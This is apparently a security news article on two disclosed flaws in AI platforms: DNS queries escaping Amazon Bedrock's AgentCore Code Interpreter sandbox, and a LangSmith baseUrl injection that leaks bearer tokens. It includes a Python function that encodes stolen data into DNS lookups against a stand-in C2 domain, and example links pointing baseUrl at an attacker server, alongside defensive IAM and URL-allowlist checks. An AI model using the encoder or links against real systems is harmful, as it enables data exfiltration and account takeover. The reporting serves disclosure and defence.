
Unmasking AI’s Achilles’ Heel: Critical Flaws in Amazon Bedrock and LangSmith Expose Data to Attackers


The burgeoning field of artificial intelligence is revolutionizing industries, yet its rapid expansion is not without significant security challenges. Recent disclosures by cybersecurity researchers have cast a spotlight on critical vulnerabilities within prominent AI platforms, specifically Amazon Bedrock and LangSmith. These flaws, ranging from unexpected network access to sophisticated account takeover mechanisms, underscore the urgent need for robust security practices in the evolving AI ecosystem.

Amazon Bedrock: When “No Network Access” Isn’t Enough

Amazon Bedrock’s AgentCore Code Interpreter, designed to provide secure, isolated sandbox environments for AI agents, has been found to harbor a significant loophole. Cybersecurity firm BeyondTrust revealed that despite configurations explicitly stating “no network access,” the service’s sandbox mode permits outbound Domain Name System (DNS) queries. This seemingly innocuous allowance opens a Pandora’s box for threat actors.

Exploiting the DNS Blind Spot

BeyondTrust’s report details how an attacker can weaponize these outbound DNS queries. By establishing a bidirectional communication channel, an adversary could:

  • Obtain interactive reverse shells, granting them direct control over the sandbox environment.
  • Exfiltrate sensitive data through DNS queries, particularly if the assigned IAM role has overprivileged access to AWS resources like S3 buckets.
  • Perform remote code execution (RCE) by feeding additional payloads to the Code Interpreter, prompting it to poll a DNS command-and-control (C2) server for commands and return results via DNS subdomain queries.
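To make the exfiltration step concrete: DNS tunneling works because each label in a queried hostname can carry attacker-chosen data, up to 63 octets per label (RFC 1035). The sketch below (hypothetical function name, not code from BeyondTrust's report) shows only the encoding side of such a channel, turning stolen bytes into the sequence of subdomain lookups a C2 nameserver would reassemble:

```python
import binascii

MAX_LABEL = 63  # RFC 1035 caps each DNS label at 63 octets


def encode_for_dns(data: bytes, c2_domain: str, max_label: int = MAX_LABEL) -> list[str]:
    """Hex-encode data and split it into label-sized chunks, yielding the
    hostnames an exfiltration channel would resolve against a C2 domain.
    A sequence-number label lets the receiving nameserver reassemble order."""
    hex_payload = binascii.hexlify(data).decode("ascii")
    chunks = [hex_payload[i:i + max_label] for i in range(0, len(hex_payload), max_label)]
    return [f"{seq}.{chunk}.{c2_domain}" for seq, chunk in enumerate(chunks)]


# Six bytes fit in a single query
print(encode_for_dns(b"secret", "c2.example.com"))
# → ['0.736563726574.c2.example.com']
```

Because resolution happens through the platform's own recursive resolver, no direct outbound connection to the attacker is ever made, which is why a "no network access" posture that still allows DNS leaves this channel open.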

The vulnerability, which currently lacks a CVE identifier but carries a CVSS score of 7.5, highlights how easily network isolation guarantees can be undermined by overlooked functionalities. As Kinnaird McQuade, chief security architect at BeyondTrust, emphasized, this behavior allows “threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls.”

Amazon’s Stance and Mitigation Strategies

Following responsible disclosure in September 2025, Amazon classified this behavior as “intended functionality” rather than a defect. They recommend that customers requiring complete network isolation utilize VPC mode instead of sandbox mode for AgentCore Code Interpreter instances. Additionally, the tech giant advises implementing a DNS firewall to meticulously filter outbound DNS traffic.

Security experts echo these recommendations. Jason Soroko, senior fellow at Sectigo, urged administrators to “inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode.” He further stressed the importance of rigorous auditing of IAM roles, enforcing the principle of least privilege to minimize potential damage from any compromise.
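The IAM-auditing advice above can be partly automated. As a minimal sketch (the function name and finding format are illustrative, not an AWS tool), the check below scans an already-fetched IAM policy document, such as one returned by the real `iam:GetPolicyVersion` API, for Allow statements granting broad S3 access, the overprivilege that turns a sandbox escape into a data breach:

```python
def s3_wildcard_findings(policy_document: dict) -> list[str]:
    """Return the Allow-statement actions in an IAM policy document that
    grant broad S3 access (e.g. "*" or "s3:*"). Least privilege means a
    compromised Code Interpreter role should name only the exact actions
    and buckets it needs."""
    statements = policy_document.get("Statement", [])
    if isinstance(statements, dict):  # IAM permits a single bare statement object
        statements = [statements]
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        for action in actions:
            # Flag full wildcards and any wildcarded s3: action
            if action == "*" or (action.lower().startswith("s3:") and "*" in action):
                findings.append(action)
    return findings


risky = {"Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}
print(s3_wildcard_findings(risky))  # → ['s3:*']
```

A real audit would also weigh the `Resource` element and `Deny` statements; this check only surfaces the most obvious wildcard grants for manual review.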

LangSmith: A High-Severity Account Takeover Threat

Adding to the concerns in the AI security landscape, Miggo Security uncovered a high-severity flaw in LangSmith, an AI observability platform. This vulnerability (CVE-2026-25750, CVSS score: 8.5) exposed users to token theft and potential account takeover, affecting both self-hosted and cloud deployments.

The Peril of URL Parameter Injection

The core of the LangSmith flaw lies in a lack of validation on the baseUrl parameter, leading to URL parameter injection. An attacker could craft a malicious link that, when clicked by a signed-in user, would transmit their bearer token, user ID, and workspace ID to a server controlled by the attacker. Examples provided include:

  • Cloud: smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
  • Self-hosted: /studio/?baseUrl=https://attacker-server.com
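The underlying defect is accepting an attacker-controlled `baseUrl` without validation. A standard remedy, sketched here with a hypothetical function name rather than LangSmith's actual patch, is to parse the supplied URL and accept it only if its scheme and exact hostname match an allowlist:

```python
from urllib.parse import urlparse


def is_allowed_base_url(raw_url: str, allowed_hosts: frozenset[str]) -> bool:
    """Accept a user-supplied baseUrl only if it is http(s) and its exact
    hostname is on the allowlist; anything else (other schemes, unknown
    hosts, malformed URLs) is rejected."""
    try:
        parsed = urlparse(raw_url)
        host = parsed.hostname  # can raise ValueError on malformed hosts
    except ValueError:
        return False
    if parsed.scheme not in ("http", "https"):
        return False
    return host in allowed_hosts


print(is_allowed_base_url("https://attacker-server.com", frozenset({"localhost"})))
# → False
```

Exact-match hostname comparison matters: substring or prefix checks are routinely bypassed with lookalike domains such as `localhost.attacker-server.com`.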

Successful exploitation could grant unauthorized access to an AI’s trace history, potentially exposing sensitive internal data such as SQL queries, CRM customer records, or proprietary source code. Miggo researchers Liad Eliyahu and Eliana Vuijsje warned, “A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link.”

Lessons for AI Observability

This LangSmith vulnerability serves as a stark reminder that AI observability platforms are rapidly becoming critical infrastructure. As these tools prioritize developer flexibility and rapid iteration, security guardrails can sometimes be inadvertently bypassed. The risk is amplified by the deep access AI agents often have to internal systems, making them attractive targets for exploitation.

The Imperative of Proactive AI Security

These recent disclosures highlight a crucial truth: as AI systems become more integrated and powerful, their attack surface expands dramatically. The vulnerabilities in Amazon Bedrock and LangSmith are not isolated incidents but rather symptomatic of the broader challenges in securing complex AI environments. Developers, administrators, and security teams must adopt a proactive, defense-in-depth approach, prioritizing secure configurations, least privilege principles, continuous auditing, and rapid patching to safeguard the integrity and confidentiality of AI-driven operations.

